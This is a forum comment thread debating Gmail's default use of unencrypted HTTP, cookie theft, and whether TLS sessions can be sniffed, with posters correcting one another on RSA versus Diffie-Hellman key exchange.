No, what would make the difference with IPv6 might be the crypto, as it's far enough below the application layer that you could have dedicated hardware for it, probably making it easier for Google (and others) to default to secure connections for everything.

But does IPv6 have much protection against IP spoofing, on a plaintext connection?

Re:check this out!!!

because you are? -no, I'll pass

Re:Could be fixed easily by Google. Shame.

[kasperd]

A huge part of security is having sane defaults. If you support 'secure' and 'insecure' you should default to 'secure,' and let users who know what they are doing, and need 'insecure' behaviour opt into it.

So when I type a domain name into my browser, it should default to https instead of http like all the browsers I have seen so far?

Re:Ciphers and key exchange mechanisms are discret

[archen]

Assuming what you would do is sniffing as opposed to a man in the middle attack. A lot of work has gone into encryption but people seem to forget about the other peices of the puzzle. Where are those DNS packets coming from? Do you accept ICMP redirects? Is your gateway really a router?

http://monkey.org/~dugsong/dsniff/faq.html

see section on "how do I hijack/sniff https connections?".

Re:Could be fixed easily by Google. Shame.

Once you log in, it reverts back to http:/// if you started with http://./ But the login form is always https://./

Re:Could be fixed easily by Google. Shame.

I disagree. It's not their responsibility to make you be secure, especially in terms of using their free service. If you give a damn, you'll add the one letter to the url to secure your connection. If you don't you'll keep blissfully using the service unsecured, and that's your own look out.

This attitude makes me want to scream. Two reasons:

* The average user doesn't know what SSL is, and doesn't know that he doesn't know. When will the utterly pathetic Slashdot segment that assumes the world revolves around their pet obsession realize that most people don't have an interest in this? You'd be mightily pissed if you bought crashed your car, and the airbag didn't work, because "duh, you have to turn on the flux capacitor if you want it enabled -- anyone with any interest in modern car construction knows that! If you gave a damn you should have done that yourself." In this particular case, there's not even a link to establishing a permanently secure session on Gmail's homepage. And if you login through https://gmail.com/ it doesn't keep the session encrypted, you have to use https://mail.google.com./ It's not even obvious to a techie that there is such an option. It wasn't to me, and I work in the security field. How on earth can you put this responsibility on the users?
* That the service is free doesn't absolve them of basic responsibilities. Obviously, you have no understanding of the laws that apply to these matters, another piece of evidence for your professional myopia.

People like you is the reason we have such immense problem with security in the first place. I say that in all seriousness. It was people like you who thought not checking for overflows in strcp was a good idea, because "anyone who cares will figure it out anyway." But it's really the thinly-veiled contempt for the large segment of your fellow humans who don't share your particular interest in internet protocols, the "let them burn" attitude, that I find disgusting. Please tell me you don't work developing applications for use by the average Joe, or we're all fucked.

What difference does that make?

[argent]

This lesson here isn't "the webmail client was hacked, don't use gmail".

It was "unencrypted network connections are insecure, use SSL or SSH".

Using POP3 with Thunderbird would have simply made it easier for them, unless you used SSL.

Which you could do with gmail as well.

Re:Ciphers and key exchange mechanisms are discret

[Covener]

Huh? I know TLS theoretically supports other key transfer mechanisms than diffie-hellman, but the last time I checked there wasn't anything else actually implemented, it's just a future compatibility mechanism. I haven't studied SSL since TLS came out, but I don't remember there being any way to avoid diffie-hellman in SSL at all.

I'll bite -- RSA key exchange is pretty common isn't it?

Re:Ciphers and key exchange mechanisms are discret

[Cajal]

"Huh? I know TLS theoretically supports other key transfer mechanisms than diffie-hellman, but the last time I checked there wasn't anything else actually implemented...."

Check the IANA registry of TLS ciphersuites(http://www.iana.org/assignments/tls-p arameters). Those without "EDH" in their names aren't performing ephemeral diffie-hellman key negotiation.

"Care to point to a section in the spec where it says you can skip secure key exchange, or post some code, or a trace of a real live browser doing this?"

The SSL and TLS specs allow multiple ways of deriving the master_secret, which is used to derive the symmetric keys. Quoting from RFC 4346 (http://www.ietf.org/rfc/rfc4346.txt), section 8:

8.1.1. RSA When RSA is used for server authentication and key exchange, a 48- byte pre_master_secret is generated by the client, encrypted under the server's public key, and sent to the server. The server uses its private key to decrypt the pre_master_secret. Both parties then convert the pre_master_secret into the master_secret, as specified above. RSA digital signatures are performed using PKCS #1 [PKCS1] block type 1. RSA public key encryption is performed using PKCS #1 block type 2. 8.1.2. Diffie-Hellman A conventional Diffie-Hellman computation is performed. The negotiated key (Z) is used as the pre_master_secret, and is converted into the master_secret, as specified above. Leading bytes of Z that contain all zero bits are stripped before it is used as the pre_master_secret.

If RSA keying is used, then there is no perfect forward secrecy. In English, that means that if an attacker can capture the TLS handshake and if the attacker can compromise the server's private key, then the attacker can decode any data from that session. If ephemeral Diffie-Hellman keying is used, this attack is not feasible, since the server's RSA keypair wasn't used to secure the key exchange (it would only have been used to authenticate the server's identity).

Also note that the client doesn't generate an asymmetric key pair (as you claimed), and that the key negotiation algorithm is independent of protection against replay attacks.

Google cookies once hacked can be used for weeks

A very scary thing about Google is that if your cookie is stolen once it can be misused for weeks. Even if you log out to terminate your session the server would still keep your session alive. A hacker can still use the stolen cookies to misuse your account. So it is very much safe to use other sites like Yahoo, etc. who terminate the session in the server.

There is a very interesting article on this at: http://lists.grok.org.uk/pipermail/full-disclosure /2007-July/064649.html

Re:Could be fixed easily by Google. Shame.

[w0lo]

Have you ever tried to connect to a xp machine with an admin account with a blank password? Guess what, it doesnt work unless you do a registry hack. No password is better than a weak password when it comes to network security.

Re:Ciphers and key exchange mechanisms are discret

[Medievalist]

You'll note that Dug Song's mitm depends on a human lack of security consciousness - the user has to specifically misconfigure or (at least) click through a warning in order to get past the lack of key validation (from a known CA in HTTPS, from the hostkeys file in SSH). Humans being the way they are, your point is still valid! My nets are nailed down pretty tight, but even here it's possible to mitm users if they've created a private SSH configuration file (using -F) and they are willing to blow off a big scary warning message.

As to the other issues you raised, I don't think a competently administered network permits DNS poisoning, ICMP/GRE middlemanning, or IP spoofing... but unfortunately, that does not protect the huge number of people on horribly incompetently administered networks (like comcast, cox, roadrunner, etc.).

Another poster has clarified the RSA key exchange mechanism and corrected my (partial) misstatement, but it's still not possible to sniff into TLS without knowing a private key that never gets transfered on the wire; given the current state of the art SSL/TLS is not breakable by sniffers, and only breakable by mitm due to human intellectual laziness.

Re:Ciphers and key exchange mechanisms are discret

[Medievalist]

Thank you for the excellent linkage - you're absolutely right (I did the unthinkable and actually checked). The client doesn't necessarily generate a key pair in IE or firefox, which is no doubt a blessing for slow machines. My apologies for spreading misinformation!

But the original poster claimed "if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in". Since none of the TLS encryptions send any "raw" private keys (the RSA example encrypts with the server public key) that statement is nonsensical. Even if you manually enable the NULL encryptions (which are not enabled by default, you have to point that gun at your head on purpose) the comment still doesn't make sense.

I understand there's no perfect forward secrecy without DHE (because the TSA can still steal your backup tapes and extract your private keys), and mitm may be feasible (if you control DNS or the target doesn't use a CA), but I still believe you are sniffer-proof with normal TLS/SSL.

You might enjoy this link which gives an idea of how firefox's default TLS implementation is evolving. Um, maybe "enjoy" is not the right word. I thought it was interesting.

Re:Ciphers and key exchange mechanisms are discret

[Medievalist]

Also, logging in via SSL doesn't always work either - if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in. SSL uses Diffie-Hellman key exchange [wikipedia.org] so no unencrypted key is ever sent that depends on what SSL ciphersuite your browser negotiated. Some SSL ciphersuite support DHE keying. For others, the client generates a random key, encrypts it with the server's public key, and sends it to the server. Huh? I know TLS theoretically supports other key transfer mechanisms than diffie-hellman, but the last time I checked there wasn't anything else actually implemented, it's just a future compatibility mechanism. I haven't studied SSL since TLS came out, but I don't remember there being any way to avoid diffie-hellman in SSL at all. I'll bite -- RSA key exchange is pretty common isn't it? M. Cajal has pointed out that you are correct; the RSA key exchange is still valid in many servers and browsers, and it does not implement Diffie-Hellman. As penance I have read the Diffie-Hellman spec and portions of the TLS spec.

But it's still not sniffable. You'd have to know the server private key to derive the session key.